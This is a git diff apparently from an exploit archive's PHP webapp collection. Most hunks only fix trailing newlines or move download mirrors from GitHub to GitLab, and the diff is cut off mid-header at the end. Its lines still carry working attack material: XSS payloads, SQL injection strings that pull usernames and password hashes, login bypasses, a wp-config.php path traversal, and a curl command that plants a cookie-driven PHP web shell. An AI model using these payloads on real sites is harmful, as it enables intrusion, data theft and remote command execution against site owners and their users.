b/exploits/php/webapps/33072.txt index 2442501a4..2bdf2dadb 100644 --- a/exploits/php/webapps/33072.txt +++ b/exploits/php/webapps/33072.txt @@ -23,4 +23,4 @@ Code : } -----------[exploit Fin] +----------[exploit Fin] \ No newline at end of file diff --git a/exploits/php/webapps/33195.txt b/exploits/php/webapps/33195.txt index ce21ec0c5..8dc1677a8 100644 --- a/exploits/php/webapps/33195.txt +++ b/exploits/php/webapps/33195.txt @@ -32,4 +32,4 @@ https://www.youtube.com/watch?v=pJ1fGN3DIMU&feature=youtu.be -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33195-Team_Helpdesk_Web.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33195-Team_Helpdesk_Web.zip \ No newline at end of file diff --git a/exploits/php/webapps/33487.txt b/exploits/php/webapps/33487.txt index d86ce7202..27e597303 100644 --- a/exploits/php/webapps/33487.txt +++ b/exploits/php/webapps/33487.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PhPepperShop 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971 +http://www.example.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971 \ No newline at end of file diff --git a/exploits/php/webapps/33987.txt b/exploits/php/webapps/33987.txt index aaff8fc89..2740dcd21 100644 --- a/exploits/php/webapps/33987.txt +++ b/exploits/php/webapps/33987.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP Banner Exchange 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/signupconfirm.php?name=indoushkax&login=hacked&pass=exploit&email=indoushka%40hotmail%2E.com&url=http%3A%2F%2F&bannerurl=<script>alert(213771818860)</script>&submit=%C7%D6%DB%D8%20%E3%D1%C9%20%E6%C7%CD%CF%C9%20%E1%E1%C7%D4%CA%D1%C7%DF +http://www.example.com/signupconfirm.php?name=indoushkax&login=hacked&pass=exploit&email=indoushka%40hotmail%2E.com&url=http%3A%2F%2F&bannerurl=<script>alert(213771818860)</script>&submit=%C7%D6%DB%D8%20%E3%D1%C9%20%E6%C7%CD%CF%C9%20%E1%E1%C7%D4%CA%D1%C7%DF \ No newline at end of file diff --git a/exploits/php/webapps/34338.html b/exploits/php/webapps/34338.html index 9dd2f30d4..d8ba95903 100644 --- a/exploits/php/webapps/34338.html +++ b/exploits/php/webapps/34338.html @@ -32,4 +32,4 @@ document.getElementById('form_addedit_submit').click(); </form> <script> document.getElementById('form_addedit_submit').click(); -</script> +</script> \ No newline at end of file diff --git a/exploits/php/webapps/34381.txt b/exploits/php/webapps/34381.txt index c4c2e6bb4..e294d8ee3 100644 --- a/exploits/php/webapps/34381.txt +++ b/exploits/php/webapps/34381.txt @@ -37,4 +37,4 @@ Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2 Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload *************************************************** -[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members. +[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members. \ No newline at end of file diff --git a/exploits/php/webapps/34684.pl b/exploits/php/webapps/34684.pl index 5fbaaed52..79dd51238 100755 --- a/exploits/php/webapps/34684.pl +++ b/exploits/php/webapps/34684.pl @@ -31,4 +31,4 @@ print "\n[+] Admin Hash : $1\n\n"; print "# Tebrikler Bro Exploit Calisti! #\n\n"; } else{print "\n[-] Malesef Bro Exploit Calismadi...\n"; -} +} \ No newline at end of file diff --git a/exploits/php/webapps/34708.pl b/exploits/php/webapps/34708.pl index 496d87575..f8e42d0cc 100755 --- a/exploits/php/webapps/34708.pl +++ b/exploits/php/webapps/34708.pl @@ -37,5 +37,4 @@ print "\n[+] Admin Hash : $1\n\n"; print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n"; } else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n"; -} - +} \ No newline at end of file diff --git a/exploits/php/webapps/34818.html b/exploits/php/webapps/34818.html index 50c13d77e..97e43bacc 100644 --- a/exploits/php/webapps/34818.html +++ b/exploits/php/webapps/34818.html @@ -39,5 +39,4 @@ method="POST"> </form> </body> </div> -</html> - +</html> \ No newline at end of file diff --git a/exploits/php/webapps/35460.txt b/exploits/php/webapps/35460.txt index 7efcc6993..3fb95820f 100644 --- a/exploits/php/webapps/35460.txt +++ b/exploits/php/webapps/35460.txt @@ -33,5 +33,4 @@ Datos. POF: localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo -ad.php?file=../../../wp-config.php - +ad.php?file=../../../wp-config.php \ No newline at end of file diff --git a/exploits/php/webapps/35566.txt b/exploits/php/webapps/35566.txt index 700ea8439..fdb7aef57 100644 --- a/exploits/php/webapps/35566.txt +++ b/exploits/php/webapps/35566.txt @@ -12,4 +12,4 @@ http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3 http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E Stored XSS: -http://www.example.com/editPage.yaws?node=home +http://www.example.com/editPage.yaws?node=home \ No newline at end of file diff --git a/exploits/php/webapps/35996.txt b/exploits/php/webapps/35996.txt index f6fbc48de..5add14628 100644 --- a/exploits/php/webapps/35996.txt +++ b/exploits/php/webapps/35996.txt @@ -27,4 +27,4 @@ Exploit(Cross Site Scripting): Thanks for read :) - Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers. + Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers. \ No newline at end of file diff --git a/exploits/php/webapps/36386.txt b/exploits/php/webapps/36386.txt index 338ce6af1..0589a80bb 100644 --- a/exploits/php/webapps/36386.txt +++ b/exploits/php/webapps/36386.txt @@ -8,6 +8,4 @@ go to www.target.com/path/admin.php username = admin 'or' 1=1 -password = anything - - +password = anything \ No newline at end of file diff --git a/exploits/php/webapps/36561.txt b/exploits/php/webapps/36561.txt index 1e9f7b956..d2f595519 100644 --- a/exploits/php/webapps/36561.txt +++ b/exploits/php/webapps/36561.txt @@ -9,4 +9,4 @@ Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. [+]Proof Of Concept: -127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL +127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL \ No newline at end of file diff --git a/exploits/php/webapps/37389.txt b/exploits/php/webapps/37389.txt index eb8a87358..82ab30fe5 100644 --- a/exploits/php/webapps/37389.txt +++ b/exploits/php/webapps/37389.txt @@ -113,5 +113,4 @@ http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=785 The attacker can now log as superlibrarian. Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. -Alice needs to have access to the OPAC interface and to have permissions to create public lists. - +Alice needs to have access to the OPAC interface and to have permissions to create public lists. \ No newline at end of file diff --git a/exploits/php/webapps/37629.txt b/exploits/php/webapps/37629.txt index e8fef4f5e..5e4dfdac1 100644 --- a/exploits/php/webapps/37629.txt +++ b/exploits/php/webapps/37629.txt @@ -58,4 +58,4 @@ Timeline Discovered by dxw: ================ Tom Adams -Please visit security.dxw.com for more information. +Please visit security.dxw.com for more information. \ No newline at end of file diff --git a/exploits/php/webapps/37959.txt b/exploits/php/webapps/37959.txt index 125d77be6..7352ce527 100644 --- a/exploits/php/webapps/37959.txt +++ b/exploits/php/webapps/37959.txt @@ -52,4 +52,4 @@ mysql_close($mysql); http://www.example.com/demo/demo1.png http://www.example.com/demo/demo2.png - http://www.example.com/demo/demo3.png + http://www.example.com/demo/demo3.png \ No newline at end of file diff --git a/exploits/php/webapps/38477.txt b/exploits/php/webapps/38477.txt index 331b670e1..1aae214d4 100644 --- a/exploits/php/webapps/38477.txt +++ b/exploits/php/webapps/38477.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Todoo Forum 2.0 is vulnerable; other versions may also be affected. http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1 -http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here] +http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here] \ No newline at end of file diff --git a/exploits/php/webapps/38991.pl b/exploits/php/webapps/38991.pl index b7732fdad..a3fa8ee07 100755 --- a/exploits/php/webapps/38991.pl +++ b/exploits/php/webapps/38991.pl @@ -82,4 +82,4 @@ sub usage() print " Bug Found by bd0rk \r\n"; print "============================================================================\r\n"; exit(); - } + } \ No newline at end of file diff --git a/exploits/php/webapps/39167.txt b/exploits/php/webapps/39167.txt index d8aa179a0..12062b6d8 100644 --- a/exploits/php/webapps/39167.txt +++ b/exploits/php/webapps/39167.txt @@ -27,4 +27,4 @@ open link application/install.php a form will appear, first text field is for new admin username and second field is for new password of web application -proceed with installation and web application will setup with new attacker supplied admin username password +proceed with installation and web application will setup with new attacker supplied admin username password \ No newline at end of file diff --git a/exploits/php/webapps/39272.txt b/exploits/php/webapps/39272.txt index b7debbeda..bbc701d8f 100644 --- a/exploits/php/webapps/39272.txt +++ b/exploits/php/webapps/39272.txt @@ -26,4 +26,4 @@ also embedded These files : CMSimple/2site/index.php CMSimple/cmsimple/cms.php CMSimple/index.php - CMSimple/plugins/index.php + CMSimple/plugins/index.php \ No newline at end of file diff --git a/exploits/php/webapps/40209.py b/exploits/php/webapps/40209.py index c12c634cf..84a45437a 100755 --- a/exploits/php/webapps/40209.py +++ b/exploits/php/webapps/40209.py @@ -55,7 +55,7 @@ # Advisory ID: ZSL-2016-5348 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php # NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40209.zip +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40209.zip # # # 14.01.2016 diff --git a/exploits/php/webapps/4059.txt b/exploits/php/webapps/4059.txt index b1d02a302..f229df0bb 100644 --- a/exploits/php/webapps/4059.txt +++ b/exploits/php/webapps/4059.txt @@ -106,6 +106,6 @@ Submit download the netcat+exploit from my server: http://corryl.altervista.org/index.php?mod=Download/Exploit#exploit-LRCF-v3.4.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4059.rar (06112007-exploit-LRCF-v3.4.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4059.rar (06112007-exploit-LRCF-v3.4.rar) # milw0rm.com [2007-06-11] \ No newline at end of file diff --git a/exploits/php/webapps/40637.txt b/exploits/php/webapps/40637.txt index da5874ab8..b0e354a25 100644 --- a/exploits/php/webapps/40637.txt +++ b/exploits/php/webapps/40637.txt @@ -37,4 +37,4 @@ $ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080 Full Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40637.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40637.zip \ No newline at end of file diff --git a/exploits/php/webapps/40755.html b/exploits/php/webapps/40755.html index 8a8b67ac8..e42b02b35 100644 --- a/exploits/php/webapps/40755.html +++ b/exploits/php/webapps/40755.html @@ -213,4 +213,4 @@ Patch is available. Install patch using the ATutor Patcher. Link to download patch: http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml ---------------------------------------------------------------------------- +--------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/41005.txt b/exploits/php/webapps/41005.txt index 2465a42c3..cae550249 100644 --- a/exploits/php/webapps/41005.txt +++ b/exploits/php/webapps/41005.txt @@ -33,4 +33,4 @@ without further or do this is a poc code curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null -if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi +if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi \ No newline at end of file diff --git a/exploits/php/webapps/41201.txt b/exploits/php/webapps/41201.txt index 70f898893..f3f596a5c 100644 --- a/exploits/php/webapps/41201.txt +++ b/exploits/php/webapps/41201.txt @@ -16,5 +16,4 @@ # http://localhost/[PATH]/message.php?pid=[SQL] # http://localhost/[PATH]/showSubcat.php?q=[SQL] # E.t.c -# # # # # - +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/41580.pl b/exploits/php/webapps/41580.pl index afc979f51..a05d82ae9 100755 --- a/exploits/php/webapps/41580.pl +++ b/exploits/php/webapps/41580.pl @@ -257,8 +257,4 @@ sub usage() { "[*---------------------------------------------------------*]\n"; exit; -} - - - - +} \ No newline at end of file diff --git a/exploits/php/webapps/4195.txt b/exploits/php/webapps/4195.txt index 0b6943cc7..614d64267 100644 --- a/exploits/php/webapps/4195.txt +++ b/exploits/php/webapps/4195.txt @@ -1,10 +1,10 @@ dork:inurl:bemarket xpl:/bemarket/postscript/postscript.php?p_mode= - + original post:http://darkcode.ath.cx/f0rum/ind3x.php?action=vthread&forum=12&topic=80 - + Greetz:d3hydr8,whoami - + mozi2weed@yahoo.com magenkyo.sharingan@yahoo.com diff --git a/exploits/php/webapps/42003.txt b/exploits/php/webapps/42003.txt index b1051a0d8..f51b3caec 100644 --- a/exploits/php/webapps/42003.txt +++ b/exploits/php/webapps/42003.txt @@ -50,4 +50,4 @@ $filename will be visible on page: line 123 : $content .= _('Uploaded file') . ': ' . $filename . '<p />'; ----------------------------------------------------------------------- +---------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/4201.txt b/exploits/php/webapps/4201.txt index 0c2ea1d57..aa0675cf3 100644 --- a/exploits/php/webapps/4201.txt +++ b/exploits/php/webapps/4201.txt @@ -19,7 +19,7 @@ http://[target]/[path]//index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Inject] -Example: +Example: //index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/* diff --git a/exploits/php/webapps/42172.txt b/exploits/php/webapps/42172.txt index 94c53addf..87bca774a 100644 --- a/exploits/php/webapps/42172.txt +++ b/exploits/php/webapps/42172.txt @@ -44,5 +44,4 @@ latest version. http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/ -http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603 - +http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603 \ No newline at end of file diff --git a/exploits/php/webapps/42173.txt b/exploits/php/webapps/42173.txt index c9bd65eaf..0d85d3318 100644 --- a/exploits/php/webapps/42173.txt +++ b/exploits/php/webapps/42173.txt @@ -44,7 +44,4 @@ for a hotfix. http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje ction-sqli/ -http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429 - - - +http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429 \ No newline at end of file diff --git a/exploits/php/webapps/42572.txt b/exploits/php/webapps/42572.txt index 31f1e82ae..26c77e0ac 100644 --- a/exploits/php/webapps/42572.txt +++ b/exploits/php/webapps/42572.txt @@ -25,4 +25,4 @@ # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/42584.txt b/exploits/php/webapps/42584.txt index 66c2b0172..a1122dbd3 100644 --- a/exploits/php/webapps/42584.txt +++ b/exploits/php/webapps/42584.txt @@ -50,4 +50,4 @@ Description : attacker can craft a malicious page and send it to any user who is </html> -|-----------------------------------------EOF----------------------------------------- +|-----------------------------------------EOF----------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/42592.html b/exploits/php/webapps/42592.html index a4422c87e..07edbd0f2 100644 --- a/exploits/php/webapps/42592.html +++ b/exploits/php/webapps/42592.html @@ -65,9 +65,4 @@ # or exploits by the author or elsewhere. # # -# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # - - - - - +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/exploits/php/webapps/42598.txt b/exploits/php/webapps/42598.txt index c87a42e1a..7946a63db 100644 --- a/exploits/php/webapps/42598.txt +++ b/exploits/php/webapps/42598.txt @@ -31,6 +31,4 @@ • 500 (Internal Server Error) - 6637 times • [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • - • [*] shutting down at 16:48:10 - - + • [*] shutting down at 16:48:10 \ No newline at end of file diff --git a/exploits/php/webapps/42615.txt b/exploits/php/webapps/42615.txt index 67b2d77ab..fbdb89064 100644 --- a/exploits/php/webapps/42615.txt +++ b/exploits/php/webapps/42615.txt @@ -40,6 +40,6 @@ Exploit timeline : Full exploit code is attached <loose code for demonstration purposes only> -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42615.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42615.zip Thanks fly to R1z clan :) \ No newline at end of file diff --git a/exploits/php/webapps/42618.txt b/exploits/php/webapps/42618.txt index 6063438dd..0344536a6 100644 --- a/exploits/php/webapps/42618.txt +++ b/exploits/php/webapps/42618.txt @@ -69,4 +69,4 @@ Benjamin Lim - [https://limbenjamin.com] -- *Benjamin Lim* E: mail@limbenjamin.com -PGP : https://limbenjamin.com/pgp +PGP : https://limbenjamin.com/pgp \ No newline at end of file diff --git a/exploits/php/webapps/42637.txt b/exploits/php/webapps/42637.txt index 981bfb24b..8295ad63d 100644 --- a/exploits/php/webapps/42637.txt +++ b/exploits/php/webapps/42637.txt @@ -24,4 +24,4 @@ # -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/42640.txt b/exploits/php/webapps/42640.txt index f4167e7f5..976f78568 100644 --- a/exploits/php/webapps/42640.txt +++ b/exploits/php/webapps/42640.txt @@ -26,4 +26,4 @@ # http://localhost/[PATH]/info.php?page=[SQL] # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/42643.txt b/exploits/php/webapps/42643.txt index d29e107a1..c2df6980e 100644 --- a/exploits/php/webapps/42643.txt +++ b/exploits/php/webapps/42643.txt @@ -22,4 +22,4 @@ # http://localhost/[PATH]/business-searchlist?country=[SQL]&state=[SQL]&city=[SQL]&farm_cat=[SQL] # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/42717.txt b/exploits/php/webapps/42717.txt index fec113d98..4bf738bde 100644 --- a/exploits/php/webapps/42717.txt +++ b/exploits/php/webapps/42717.txt @@ -24,4 +24,4 @@ # 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''=' # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/42754.txt b/exploits/php/webapps/42754.txt index 446c73276..469b0425d 100644 --- a/exploits/php/webapps/42754.txt +++ b/exploits/php/webapps/42754.txt @@ -40,4 +40,4 @@ email in Italian to the company. 2017-09-18 - No response, full public disclosure. DEDICATED TO MARCUS ASTROM -FOREVER LOVED - NEVER FORGOTTEN +FOREVER LOVED - NEVER FORGOTTEN \ No newline at end of file diff --git a/exploits/php/webapps/42755.txt b/exploits/php/webapps/42755.txt index 0da67c0e3..93ec8cf37 100644 --- a/exploits/php/webapps/42755.txt +++ b/exploits/php/webapps/42755.txt @@ -40,4 +40,4 @@ email in Italian to the company. 2017-09-18 - No response, full public disclosure. DEDICATED TO MARCUS ASTROM -FOREVER LOVED - NEVER FORGOTTEN +FOREVER LOVED - NEVER FORGOTTEN \ No newline at end of file diff --git a/exploits/php/webapps/42959.py b/exploits/php/webapps/42959.py index c610d6d2a..abac0add5 100755 --- a/exploits/php/webapps/42959.py +++ b/exploits/php/webapps/42959.py @@ -186,4 +186,4 @@ else: conn2.close() # 3. Solution: -# Update to Unitrends UEB 10 +# Update to Unitrends UEB 10 \ No newline at end of file diff --git a/exploits/php/webapps/42968.txt b/exploits/php/webapps/42968.txt index dd3203ddf..091c87def 100644 --- a/exploits/php/webapps/42968.txt +++ b/exploits/php/webapps/42968.txt @@ -55,4 +55,4 @@ web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL 5.0 [00:47:57] [WARNING] HTTP error codes detected during run: -500 (Internal Server Error) - 444 times +500 (Internal Server Error) - 444 times \ No newline at end of file diff --git a/exploits/php/webapps/42971.rb b/exploits/php/webapps/42971.rb index 371ebd321..5b6266e3f 100755 --- a/exploits/php/webapps/42971.rb +++ b/exploits/php/webapps/42971.rb @@ -213,4 +213,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end -end +end \ No newline at end of file diff --git a/exploits/php/webapps/42979.txt b/exploits/php/webapps/42979.txt index 217a779ed..7761a2763 100644 --- a/exploits/php/webapps/42979.txt +++ b/exploits/php/webapps/42979.txt @@ -16,4 +16,4 @@ Poc: Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)-- UACx - sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs + sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs \ No newline at end of file diff --git a/exploits/php/webapps/42980.txt b/exploits/php/webapps/42980.txt index aae1a7ce6..04119edc8 100644 --- a/exploits/php/webapps/42980.txt +++ b/exploits/php/webapps/42980.txt @@ -13,4 +13,4 @@ username and password PoC: Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or' POST: http://vulnsite/esic/index/index.php -DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar +DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar \ No newline at end of file diff --git a/exploits/php/webapps/42981.txt b/exploits/php/webapps/42981.txt index dbccfd86f..5128822a2 100644 --- a/exploits/php/webapps/42981.txt +++ b/exploits/php/webapps/42981.txt @@ -24,4 +24,4 @@ Parameter: cpfcnpj (POST) Title: Generic UNION query (NULL) - 5 columns Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL-- -GJkR&btsub=Enviar +GJkR&btsub=Enviar \ No newline at end of file diff --git a/exploits/php/webapps/42982.txt b/exploits/php/webapps/42982.txt index 5abb9fbc7..a9b63029f 100644 --- a/exploits/php/webapps/42982.txt +++ b/exploits/php/webapps/42982.txt @@ -33,4 +33,4 @@ Parameter: f (POST) Payload: f=test' UNION ALL SELECT 3344,3344, CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71), - 3344,3344,3344# + 3344,3344,3344# \ No newline at end of file diff --git a/exploits/php/webapps/42983.txt b/exploits/php/webapps/42983.txt index 358772f1d..f233fc2b9 100644 --- a/exploits/php/webapps/42983.txt +++ b/exploits/php/webapps/42983.txt @@ -20,4 +20,4 @@ DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E& cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=& idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com& confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=& -uf=&numero=&complemento=&acao=Salvar +uf=&numero=&complemento=&acao=Salvar \ No newline at end of file diff --git a/exploits/php/webapps/43027.txt b/exploits/php/webapps/43027.txt index dbd5b80d9..a50144e06 100644 --- a/exploits/php/webapps/43027.txt +++ b/exploits/php/webapps/43027.txt @@ -57,4 +57,4 @@ Host: example.com Connection: close Content-type: text/html; charset=UTF-8 -uid=33(www-data) gid=33(www-data) groups=33(www-data) +uid=33(www-data) gid=33(www-data) groups=33(www-data) \ No newline at end of file diff --git a/exploits/php/webapps/43043.txt b/exploits/php/webapps/43043.txt index 15b63430a..8f735e9bb 100644 --- a/exploits/php/webapps/43043.txt +++ b/exploits/php/webapps/43043.txt @@ -34,6 +34,4 @@ Parameter: category (POST) Payload: category=5 AND 1845=1845&keywords=xxxxx ================== -8bitsec - [https://twitter.com/_8bitsec] - - +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/exploits/php/webapps/43063.txt b/exploits/php/webapps/43063.txt index ed0c52eea..fc025f3df 100644 --- a/exploits/php/webapps/43063.txt +++ b/exploits/php/webapps/43063.txt @@ -38,4 +38,4 @@ Steps to reproduce: 3. Solution Update to phpMyFAQ Version 2.9.9 -http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip +http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip \ No newline at end of file diff --git a/exploits/php/webapps/43066.txt b/exploits/php/webapps/43066.txt index 9e02496c2..66d60e88a 100644 --- a/exploits/php/webapps/43066.txt +++ b/exploits/php/webapps/43066.txt @@ -37,4 +37,4 @@ # Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87# # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43072.txt b/exploits/php/webapps/43072.txt index b52ab90b3..28712f1d9 100644 --- a/exploits/php/webapps/43072.txt +++ b/exploits/php/webapps/43072.txt @@ -46,4 +46,4 @@ # Payload: id=237 AND SLEEP(5) # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43073.txt b/exploits/php/webapps/43073.txt index 